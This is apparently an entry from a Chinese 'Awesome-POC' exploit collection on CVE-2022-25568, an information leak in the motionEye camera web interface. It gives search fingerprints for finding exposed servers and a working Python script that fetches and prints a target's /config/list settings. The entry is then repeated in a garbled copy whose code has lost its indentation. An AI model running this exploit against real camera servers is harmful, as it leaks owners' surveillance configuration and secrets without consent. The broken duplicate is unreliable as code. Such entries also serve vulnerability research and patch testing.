Awesome-POC/开发框架漏洞/MotionEye 视频监控组件 list 信息泄漏洞 CVE-2022-25568.md

# MotionEye 视频监控组件 list 信息泄漏洞 CVE-2022-25568

## 漏洞描述

*motionEye*是用 Python 写的 motion 的 Web 前端，它可以监视视频信号并检测运动。它可以与多种类型的摄像机配合使用,也可以与电影文件一起使用,从而使您可以分析录制的视频，其中存在一个信息泄漏漏洞，通过构造特定的 URL 即可获取服务器敏感信息

## 漏洞影响

```
MotionEye <= v0.42.1
```

## 网络测绘

```
banner="motionEye"

app="motionEye"
app="motionEye-摄像头服务器"
app="motionEye/0.39.3"
app="motionEye/0.40"
app="motionEye01"
app="motionEye/0.33"
app="motionEye/0.35"
```

## 漏洞复现

通过查看响应 Server 判断是否使用，访问路由 `/config/list`

## 漏洞 POC

```python
import sys
import json
import requests
def exp(url):
    if url[-1] == "/":
        url = url + "config/list"
    else:
        url = url + "/config/list"
    rus = requests.get(url, verify=False)
    print("信息泄露内容:")
    print(json.dumps(json.loads(rus.text), sort_keys=True, indent=4))
if __name__ == '__main__':
    ip = sys.argv[1]
    print("访问IP:{0}".format(ip))
    exp(ip)
```
update 2024-11-06 14:10:36 +08:00			`# MotionEye 视频监控组件 list 信息泄漏洞 CVE-2022-25568`

			`## 漏洞描述`

			`motionEye是用 Python 写的 motion 的 Web 前端，它可以监视视频信号并检测运动。它可以与多种类型的摄像机配合使用,也可以与电影文件一起使用,从而使您可以分析录制的视频，其中存在一个信息泄漏漏洞，通过构造特定的 URL 即可获取服务器敏感信息`

			`## 漏洞影响`

			```
			`MotionEye <= v0.42.1`
			```

			`## 网络测绘`

			```
			`banner="motionEye"`

			`app="motionEye"`
			`app="motionEye-摄像头服务器"`
			`app="motionEye/0.39.3"`
			`app="motionEye/0.40"`
			`app="motionEye01"`
			`app="motionEye/0.33"`
			`app="motionEye/0.35"`
			```

			`## 漏洞复现`

			通过查看响应 Server 判断是否使用，访问路由 `/config/list`

			`## 漏洞 POC`

			```python
			`import sys`
			`import json`
			`import requests`
			`def exp(url):`
			`if url[-1] == "/":`
			`url = url + "config/list"`
			`else:`
			`url = url + "/config/list"`
			`rus = requests.get(url, verify=False)`
			`print("信息泄露内容:")`
			`print(json.dumps(json.loads(rus.text), sort_keys=True, indent=4))`
			`if __name__ == '__main__':`
			`ip = sys.argv[1]`
			`print("访问IP:{0}".format(ip))`
			`exp(ip)`
			```